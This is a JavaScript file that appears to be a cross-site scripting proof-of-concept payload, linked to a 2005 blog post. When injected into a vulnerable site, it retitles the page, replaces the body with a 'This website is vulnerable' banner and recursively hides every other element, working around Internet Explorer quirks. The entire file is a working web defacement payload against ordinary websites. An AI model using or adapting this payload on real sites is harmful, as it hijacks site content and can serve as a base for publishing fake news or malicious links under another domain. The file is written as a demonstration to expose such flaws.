// First, a quick test to see if this script is being called.
//alert('It worked.')

// Only execute once.
if (typeof(done) == "undefined"){
  var done = true;

  // Set the document title.
  document.title = "This website is vulnerable";

  // Assemble the desired content.
  var text = '<BR><FONT FACE="sans-serif" SIZE=4><FIELDSET><LEGEND>This website is vulnerable</LEGEND>\n';
  text += 'Due to a basic failure to check user-input, this website allows anyone to publish <I>arbitrary content</I> on this domain.  This might include fake news, press releases, advisories, spamvertised content, or links to executable content.<BR><BR><SMALL><A HREF="http://neil.fraser.name/news/2005/07/16/">More info...</A></SMALL></FIELDSET></FONT>';

  // Replace existing content with new content
  var agt = navigator.userAgent.toLowerCase();
  var is_ie = ((agt.indexOf("msie") != -1) && (agt.indexOf("opera") == -1));
  text = '<DIV ID="hijackcontent">'+text+'</DIV><DIV STYLE="display: none">'
  if (is_ie) {
    // IE often crashes if you attempt to prune the DOM at this point.
    hideallbutlast(document.body);    
    document.write(text);
  } else {
    // Mozilla and Opera are bullet-proof.  Safari?
    document.body.innerHTML = text;
  }

  // Hide any trailing content which doesn't belong.
  window.onload = hidetail;
}

function hideallbutlast(node) {
  // Delete everything except the last branch (which is where IE will write our content)
  if (node.hasChildNodes()) {
    for (var x=0; x<node.childNodes.length-1; x++) {
      var childNode = node.childNodes[x];
      if (childNode.style)
        childNode.style.display = "none";
      else if (childNode.nodeType==3)
        childNode.data="";
    }
    hideallbutlast(node.childNodes[node.childNodes.length-1]);
  }
}

// Hide everything except 'hijackcontent' ...
function hidetail() {
  var goodNodes = [];
  var node = document.getElementById('hijackcontent');
  while (node) {
    goodNodes.push(node);
    node = node.parentNode;
  }
  hidetailrec(document.body, goodNodes);
}

// ... and do it recursively.
function hidetailrec(node, goodNodes) {
  var size = node.childNodes.length;
  for (var x=size-1; x>=0; x--) {
    var childNode = node.childNodes[x];
    if (positioninList(childNode, goodNodes) == -1) {
      if (childNode.style)
        childNode.style.display = "none";
      else if (childNode.nodeType==3)
        childNode.data="";
    } else if (childNode.id != 'hijackcontent')
      hidetailrec(childNode, goodNodes);
  }
}

// Return the position of 'el' in 'list'.
function positioninList(el, list) {
  for(var x=0; x<list.length; x++)
    if (el == list[x])
      return x;
  return -1;
}